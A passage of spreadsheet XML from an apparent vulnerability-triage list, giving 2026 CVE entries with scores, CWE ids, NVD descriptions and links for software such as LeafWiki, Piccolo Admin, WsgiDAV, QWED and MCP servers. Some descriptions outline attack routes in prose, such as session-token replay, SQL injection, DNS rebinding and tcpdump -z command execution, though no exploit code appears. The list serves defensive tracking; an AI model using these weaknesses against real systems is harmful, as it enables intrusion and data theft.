      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr"/>
      <c r="Q178" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>LeafWiki is a self-hosted wiki. Versions 0.3.0 through 0.10.0 have a path traversal vulnerability in LeafWiki’s asset rename functionality. An authenticated user with editor permissions could move files that are accessible to the LeafWiki server process into a page’s asset directory. This could allow sensitive local files, such as the application database, to become downloadable as page assets. Users should update to version 0.10.1 or greater. As an additional mitigation, operators should ensure that the LeafWiki process runs with the least privileges necessary and does not have filesystem access to sensitive files outside the application’s required directories. Until a patch is applied, operators may reduce risk by restricting editor access to trusted users only and by limiting the filesystem permissions of the LeafWiki process.</t>
        </is>
      </c>
      <c r="S178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53528</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53706</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr"/>
      <c r="Q179" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>PREVAIL is a Polynomial-Runtime EBPF Verifier using an Abstract Interpretation Layer. Prior to version 0.2.4, the prevail eBPF verifier accepts ALU32 ADD and SUB instructions that operate on pointer-typed registers without checking the is64 flag. Because ALU32 arithmetic zero-extends the 32-bit result, the upper half of any pointer is silently destroyed at runtime, yet prevail marks the program as verified safe. Any caller that can submit an eBPF program for verification — including unprivileged users on kernels that permit BPF program loading — can produce a program that passes verification but faults or misbehaves at runtime. This issue has been patched in version 0.2.4.</t>
        </is>
      </c>
      <c r="S179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53706</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54721</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr"/>
      <c r="Q180" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>Silverstripe UserForms provides a visual form builder for the Silverstripe CMS. From 6.0.0 until 6.4.9, 7.0.7, and 7.1.1, the userform email recipient subject field in the CMS accepts a specially crafted payload that can be interpreted as executable server-side code. An authenticated CMS user with permission to configure a UserForms email recipient can use the subject field to run arbitrary code on the server, compromising confidentiality, integrity, and availability. This issue is fixed in versions 6.4.9, 7.0.7, and 7.1.1.</t>
        </is>
      </c>
      <c r="S180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54721</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55485</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr"/>
      <c r="Q181" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-269, CWE-863</t>
        </is>
      </c>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>Piccolo Admin is an admin interface and content management system for Python, built on top of Piccolo. Prior to 1.14.0, piccolo_admin/endpoints.py uses superuser_validators to block PUT, PATCH, DELETE, and POST requests by non-superusers but permits GET requests to configured user and session tables, while piccolo_api/session_auth/tables.py exposes SessionsBase.token because the token column is not secret. In deployments that add the Sessions and User tables to create_admin, a non-superuser administrator can call GET /api/tables/sessions/, obtain another user's live session token, replay it as the Cookie id value to impersonate a superuser, and permanently set superuser to true on the attacker's own row. This issue is fixed in version 1.14.0.</t>
        </is>
      </c>
      <c r="S181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55485</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55509</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr"/>
      <c r="Q182" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>WsgiDAV is a generic and extendable WebDAV server based on WSGI. Prior to 4.3.5, the sample MySQLBrowserProvider in wsgidav/samples/mysql_dav_provider.py concatenates the record key parsed from a request URL directly into SQL WHERE clauses. The affected _exists_record_by_primary_key, _get_field_by_primary_key, and _get_record_by_primary_key methods are part of a shipped example provider that is not enabled by default. An attacker who can access a share explicitly configured with this non-default provider can inject SQL through a normal GET request; anonymously exposed read shares permit a status-code oracle and extraction of arbitrary data reachable by the configured MySQL account. This issue is fixed in version 4.3.5.</t>
        </is>
      </c>
      <c r="S182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55509</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55541</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr"/>
      <c r="Q183" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, praisonai serve agents and praisonai serve unified parse --api-key but _create_agents_app() and _create_unified_app() do not install a credential check. Unauthenticated callers can reach POST /agents and POST /api/v1/agents/{id}/invoke. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55541</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55585</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr"/>
      <c r="Q184" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>QWED is open-source AI verification infrastructure for deterministic verification of LLM outputs, tool calls, code, schemas, and agent state before production execution. Prior to 5.1.2, the qwed package passes caller-controlled math expressions directly to SymPy parse_expr() without restricted global_dict and local_dict namespaces, allowing Python eval() to resolve builtins and execute arbitrary Python code in the API server process. In src/qwed_new/api/main.py, POST /verify/math is protected by get_current_tenant but accepts any valid tenant API key, reads the expression field, applies only a cosmetic re.sub(r'(\d)(()', r'\1*\2', expression) normalization, and passes the result to parse_expr(). In src/qwed_new/core/batch.py, POST /verify/batch sends math items through batch_service.create_job(), stores item.query verbatim, and _verify_item() passes VerificationType.MATH input to parse_expr() without sanitization. The default-enabled POST /auth/signup endpoint allows anyone to create a standard tenant account, POST /auth/api-keys issues an x-api-key, and either vulnerable path can then be used to read or write files, modify data, execute operating system commands, terminate the service, and compromise other tenants in a shared deployment. This issue is fixed in version 5.1.2.</t>
        </is>
      </c>
      <c r="S184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55585</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55637</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr"/>
      <c r="Q185" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>genieacs-mcp is an MCP server for GenieACS written in Go. Prior to 0.3.2, the Streamable HTTP transport in cmd/server/main.go creates an unauthenticated /mcp listener on the default MCP_LISTEN_ADDR value 127.0.0.1:8080 when MCP_AUTH_TOKEN is unset and the httpSrv.Start(addr) branch does not validate the Host or Origin headers. A malicious website can use DNS rebinding to send browser requests with attacker-controlled Host and Origin values to the loopback listener, initialize an MCP session, list tools, and invoke operations against the GenieACS NBI configured by ACS_URL. Successful exploitation can expose or modify CPE management state, including device reboots, firmware tasks, TR-069 parameter changes, presets, provisions, tags, connection requests, and task operations. The npm wrapper is not affected because it forces TRANSPORT=stdio and does not expose an HTTP listener. This issue is fixed in version 0.3.2.</t>
        </is>
      </c>
      <c r="S185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55637</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57866</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr"/>
      <c r="Q186" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>Server side request forgery in Apache Impala versions 4.4.x and 4.5.x.  Authenticated Impala users with permissions to execute the ai_generate_text() function can exfiltrate secrets provided by the credential providers configured in the `hadoop.security.credential.provider.path` property of `core-site.xml`. The secret's key must be known to the user.</t>
        </is>
      </c>
      <c r="S186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57866</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62316</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr"/>
      <c r="Q187" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-346</t>
        </is>
      </c>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>Microsoft UFO open-source framework for intelligent automation across devices and platforms. Prior to 3.0.8, ufo/client/mcp/http_servers/linux_mcp_server.py binds a FastMCP streamable HTTP server to localhost:8010 but does not validate the Host, Origin, or Sec-Fetch-Site headers. An attacker-controlled web page can use DNS rebinding to reach the local /mcp endpoint, enumerate tool schemas through tools/list, and invoke execute_command with a valid UFO_MCP_API_KEY to read files or execute allowed operating system commands as the victim's user. This issue is fixed in version 3.0.8.</t>
        </is>
      </c>
      <c r="S187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62316</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69857</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr">
        <is>
          <t>microsoft:azure_cosmos_db</t>
        </is>
      </c>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr"/>
      <c r="Q188" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through user-controlled key in Azure Cosmos DB allows an authorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69857</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71808</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr"/>
      <c r="Q189" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>A SQL Injection vulnerability in Siam Ordering (siam-server) 1.0.0 allows remote authenticated attackers to execute arbitrary SQL commands via the ${} string concatenation in AdminMapper.java and multiple other Mapper files (including MerchantWithdrawRecordMapper.java and MemberWithdrawRecordMapper.java).</t>
        </is>
      </c>
      <c r="S189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71808</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75161</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr"/>
      <c r="Q190" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>An issue in the ugw-restart method of /cgi-bin/wwwugw.cgi in MBS-Solutions X-Serie Gateway firmware V6_00_05 allows a remote authenticated user with the low-privileged Standard role to inject arbitrary code into the dpcheck system utility executed as root.</t>
        </is>
      </c>
      <c r="S190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75161</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75166</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr"/>
      <c r="Q191" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-276</t>
        </is>
      </c>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>Insecure Permission vulnerability in MBS-Solutions X-Serie Gateway firmware V6_00_05 allows the low-privileged service user to execute /usr/bin/tcpdump as root without a password. By leveraging the tcpdump -z option, an authenticated attacker can achieve arbitrary command execution.</t>
        </is>
      </c>
      <c r="S191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75166</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75169</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr"/>
      <c r="Q192" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file upload vulnerability in /cgi-bin/ugwupload.cgi of MBS-Solutions X-Serie Gateway firmware V6_00_05 allows a remote authenticated user with Admin role to upload files with arbitrary content to hardcoded paths.</t>
        </is>
      </c>
      <c r="S192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75169</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75339</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr"/>
      <c r="Q193" s="5" t="inlineStr">
        <is>
